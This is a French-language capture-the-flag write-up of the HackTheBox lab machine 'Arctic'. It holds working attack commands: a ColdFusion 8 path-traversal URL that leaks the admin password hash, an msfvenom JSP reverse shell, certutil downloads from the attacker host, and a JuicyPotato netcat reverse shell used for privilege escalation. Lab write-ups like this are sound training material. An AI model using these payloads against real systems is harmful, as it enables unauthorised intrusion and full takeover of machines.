> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/windows-easy/artic-hackthebox-writeup.md).

# Compte rendu HackTheBox d'Artic

{% hint style="warning" %}
**Compétences :**

* Exploitation d'Adobe ColdFusion 8
* Vulnérabilité de traversée de répertoires
* Cassage de hachages
* Abus des tâches planifiées - Création d'un fichier JSP malveillant
* Abus du privilège SeImpersonate (élévation de privilèges)
  {% endhint %}

## Reconnaissance

**Configuration de l'espace de travail :**

Configurez l'espace de travail en créant trois dossiers pour stocker le contenu important, les exploits et les résultats de reconnaissance Nmap.

<figure><img src="/files/74e32d430d043d3bfb185809fa4832576b9fbffc" alt="" width="563"><figcaption></figcaption></figure>

**Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/abee8a41abc1703c0e5b48779cd7bb6d1b4f0415" alt="" width="563"><figcaption></figcaption></figure>

**Découverte des ports ouverts avec Nmap :**

Énumérez les ports ouverts et exportez les résultats dans le fichier "allPorts" du répertoire Nmap :

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.11 -oG allPorts
```

<figure><img src="/files/352bbf589c4eb3f8286ae8c7eb1fdaf894272c56" alt=""><figcaption></figcaption></figure>

**Analyse des ports ouverts avec extractPorts :**

Utilisez la fonction extractPorts pour afficher les ports ouverts dans un format concis et les copier dans le presse-papiers.

<figure><img src="/files/86b6096bf5ee0624e5adfacc0907d70f2aeb3b7c" alt="" width="563"><figcaption></figcaption></figure>

**Scan de version des ports avec Nmap :**

Utilisez Nmap pour analyser les versions des services et enregistrer la sortie dans le fichier "targeted" :

```bash
nmap -sCV -p135,8500,49154 10.10.10.11 -oN targeted
```

<figure><img src="/files/432d7dcad45a7abbd20ae7f970bcbafa979392e6" alt=""><figcaption></figcaption></figure>

## Exploitation d'Adobe ColdFusion 8 (port 8500)

Nous observons un service d'administration accessible sur le port 8500 qui nécessite un nom d'utilisateur et un mot de passe pour se connecter à Adobe ColdFusion.

<figure><img src="/files/0987e6bc905910401803c9ab1841009f0443f64d" alt=""><figcaption></figcaption></figure>

En recherchant les vulnérabilités associées dans `searchsploit`, nous trouvons un script fonctionnel pour une vulnérabilité de traversée de répertoires.

<figure><img src="/files/d88653cfb187876486a4916e7b64a8da0977aab1" alt=""><figcaption></figcaption></figure>

`searchsploit -x multiple/remote/14641.py`

Ce script révèle une vulnérabilité LFI permettant d'accéder à la liste des mots de passe :

<figure><img src="/files/3ee131a7d3c9fbef42855a86fcb0e1c7cc086001" alt=""><figcaption></figcaption></figure>

`http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en`

<figure><img src="/files/46bcdeed15d7a2ca608bb6a8b4cbe1635afd21d8" alt=""><figcaption></figcaption></figure>

Le fichier contient la valeur suivante pour le mot de passe :

`password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03`

<figure><img src="/files/ba0f698d59df77fc1cb92b621c1e5cd969811b00" alt=""><figcaption></figcaption></figure>

### Craquage du mot de passe

{% embed url="<https://crackstation.net/>" %}

En utilisant CrackStation, nous déchiffrons ce hash, et le mot de passe est `happyday`. Nous pouvons maintenant nous connecter avec succès.

<figure><img src="/files/fe3a2ea16936a08f8eb29e01f54be383340a23e7" alt=""><figcaption></figcaption></figure>

### Création d'une tâche planifiée malveillante

<figure><img src="/files/534b9edf34b301a57009d507bf52a2919668ed6a" alt=""><figcaption></figcaption></figure>

Dans la section des tâches planifiées, nous allons créer une nouvelle tâche pour enregistrer un fichier malveillant dans le `C:/ColdFusion8/wwwroot/CFIDE` répertoire, auquel nous avons des droits de lecture/écriture.

<figure><img src="/files/f38a1a927df892dc315589dd071ce7f768ad8d15" alt="" width="563"><figcaption></figcaption></figure>

**Création du fichier JSP :** Comme le serveur peut interpréter les fichiers JSP, nous allons générer un shell JSP avec `msfvenom`:

<figure><img src="/files/f52c3feed99a4fbf3b6eb683002da36e5d5fc489" alt="" width="375"><figcaption></figcaption></figure>

<figure><img src="/files/672bab05f11bd4124ba5e066b4e46e89a88f4ef0" alt=""><figcaption></figcaption></figure>

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
```

**Ajouter une nouvelle tâche :** Nous configurons la tâche planifiée pour exécuter ce fichier malveillant.

<figure><img src="/files/2da06dd21e88568fcaf594af20ff9e37f6ee3bc6" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/105c30e487254106e6ef965526f4918d5c11ca30" alt="" width="563"><figcaption></figcaption></figure>

/*/* Serveur HTTP pour transférer le fichier :/*/* Pour transférer le fichier JSP, nous lançons un serveur HTTP sur notre machine :

```bash
python3 -m http.server 80
```

<figure><img src="/files/cfc7f09e011eab2517a888d5187aea4708297942" alt=""><figcaption></figcaption></figure>

**Écoute et exécution :** Nous écoutons sur le port 443 pour recevoir le shell inverse, puis exécutons la tâche planifiée à `/CFIDE/`:

```bash
rlwrap nc -nvlp 443
```

<figure><img src="/files/e573751053328238ac9be65c19e9b91174c21e0c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/1b4603c553205e216c1febc311acae00b5529afc" alt="" width="563"><figcaption></figcaption></figure>

### Drapeau user.txt :)

<figure><img src="/files/6d23a1d9af899e32157b1153731cf66942eb0b93" alt="" width="563"><figcaption></figcaption></figure>

## Élévation de privilèges

### Abus du privilège SeImpersonate :

Nous avons constaté que l'utilisateur possède le `SeImpersonatePrivilege` privilège, ce qui le rend vulnérable à certaines techniques d'élévation de privilèges. La commande ci-dessous confirme la présence de ce privilège :

```bash
whoami /priv
```

<figure><img src="/files/d93f85ec9f5041e086004e0f51390d6a76097e4a" alt=""><figcaption></figcaption></figure>

Pour exploiter cette vulnérabilité, nous allons utiliser **JuicyPotato**, un outil bien connu pour abuser de ce privilège dans le contexte Windows.

**Téléchargement des outils nécessaires**

{% embed url="<https://github.com/ohpe/juicy-potato/releases/tag/v0.1>" %}

{% embed url="<https://eternallybored.org/misc/netcat/>" %}

**Démarrage d'un serveur HTTP** sur notre machine d'attaque pour servir des fichiers :

```bash
python3 -m http.server 8080
```

**Transférer les fichiers vers la machine cible** en utilisant `certutil`:

```powershell
certutil.exe -f -urlcache -split http://10.10.14.10:8080/JP.exe
certutil.exe -f -urlcache -split http://10.10.14.10:8080/nc64.exe
```

<figure><img src="/files/909d14528478f80ed1427b5c39609496553e00e1" alt=""><figcaption></figcaption></figure>

**Exécution de JuicyPotato pour l'élévation de privilèges**

Nous allons maintenant exécuter JuicyPotato pour obtenir une session privilégiée. La commande suivante lance JuicyPotato, qui exécute `cmd.exe` avec des privilèges élevés et initie une connexion vers notre machine d'attaque via Netcat :

```powershell
./JP.exe -t * -l 1337 -p C:/Windows/System32/cmd.exe -a "/c C:/Windows/Temp/privesc/nc.exe -e cmd 10.10.14.10 1234"
```

**Connexion à la session élevée**

Pour intercepter la connexion, nous écoutons sur le port 1234 :

```bash
rlwrap nc -nvlp 1234
```

<figure><img src="/files/807813881cc4aa15e8e90001e00ec10cecd5d4bb" alt="" width="563"><figcaption></figcaption></figure>

### Flag root :)

<figure><img src="/files/f27e26377b931e4f4587c6a751757b3d0691e3e1" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/16ac6eeb609a594c91d71c4d1e28db522b186718" alt="" width="525"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/windows-easy/artic-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
